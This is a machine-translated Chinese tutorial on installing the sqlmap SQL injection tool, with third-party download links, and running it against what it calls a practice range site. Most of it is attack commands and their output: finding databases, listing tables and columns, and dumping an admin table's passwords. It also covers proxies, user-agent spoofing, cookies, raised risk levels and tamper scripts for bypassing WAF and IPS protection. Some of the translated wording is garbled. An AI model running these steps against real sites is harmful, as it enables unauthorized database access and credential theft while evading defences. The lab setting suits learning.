sqlmap install

sqlmap Installation package
link ：https://pan.baidu.com/s/1bzR7IC6tSUgZ0bdmAxvk5g
Extraction code ：0wc5
sqlmap The command of
link ：https://pan.baidu.com/s/1dFWS2esURBBIH6WIhG8bgA
Extraction code ：dltg
In the installation sqlmap Before you install python Environmental Science
python Installation package
link ：https://pan.baidu.com/s/1tifkYDC2KIVqxGEOhbs3ug
Extraction code ：e0n5
Install well python After the environment , take sqlmap Files in python In the directory of

View directory


Input sqlmap command , function sqlmap

installation is complete ！

sqlmap Use

The shooting range of fengshentai is used here http://rhiq8003.ia.aqlab.cn/?id=1

demonstration

command ：-u, effect ： Identify target sites .
Usage method ：python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1"
command ：--dump, effect ： Check data .
Usage method ：python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --dump
Echo appears Parameter Indicates that there is a vulnerability in the website

Basic commands

command ：-h, effect ： view help . Usage method ：python sqlmap.py -h
command ：-u, effect ： Identify target sites . Usage method ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1”
command ：-r , effect ： Identify target sites . Usage method ：python sqlmap.py -r 1.txt
command ：–data, effect ： Determining parameters .python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1&pid=2&ssid=3” --data=“pid=2&ssid=3”
ps： When you manually test the website , Identify a vulnerability in a parameter . Improve the efficiency of infiltration .
ps： Parameter by parameter deletion method . Parameters are deleted one by one , Can find 【 influence 】 Website parameters . So this parameter , It is likely to be the parameter to be tested .
command ：–dbs , effect ： Query database name related data . Usage method ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs
[] information_schema
[] maoshe
[*] test
command ：-D, effect ： Specify database .↓↓↓↓ A combination of ↓↓↓↓
command ：–tables, effect ： Query all table names . Usage method ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe --tables
|admin |
| dirs |
| news |
| xss |
ps： The structure of the database ： library 、 surface 、 Column 、 data
command ：-T, effect ： Specified table name .
command ：–columns, View all column names . Usage method ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe -T admin --columns
| Id | int(11) |
| password | varchar(11) |
| username | varchar(11)
command ：-C , Total use ： Specifies the column name .↓↓↓↓ A combination of ↓↓↓↓
command ：–dump, effect ： Check data . Usage method ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe -T admin -C password --dump
ps： Prison orders
password |
| hellohack |
| zkaqbanban |
Usage method ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dump

Advanced command

command ：–proxy, effect ： Using agents . Use the syntax ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --proxy=“http://127.0.0.1:8080/”
command ：–random-agent , effect ： change UA. Use the syntax ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --proxy=“http://127.0.0.1:8080/” --random-agent
command ：–cookie, effect ： Use the website identity to scan the website . Use the syntax ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --cookie=“A=14; jwt_id=10225;”
Use -r, You don't have to –cookie
command ：–level , effect ： Improve scanning intensity . Default 1
command ：–risk , effect ： Raise the risk level . Default 1
Use the syntax ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --level 3 --risk 2
command ：–batch , effect ： Default choice , Automatic judgment ..python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --batch
Y/N
command ：–tamper, effect ： Use scripts , Bypass IPS、WAF etc. . Usage method ：python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tamper=“tamper/between.py,tamper/randomcase.py”
ps： In most cases, it doesn't work .
Personal requirements ：
1. Master winding WAF Methods .—> https://bbs.zkaq.cn/t/6205.html
2. Master writing python Script . --> self-taught

ps： The main information of this article comes from Mr. Jess who controls safety ！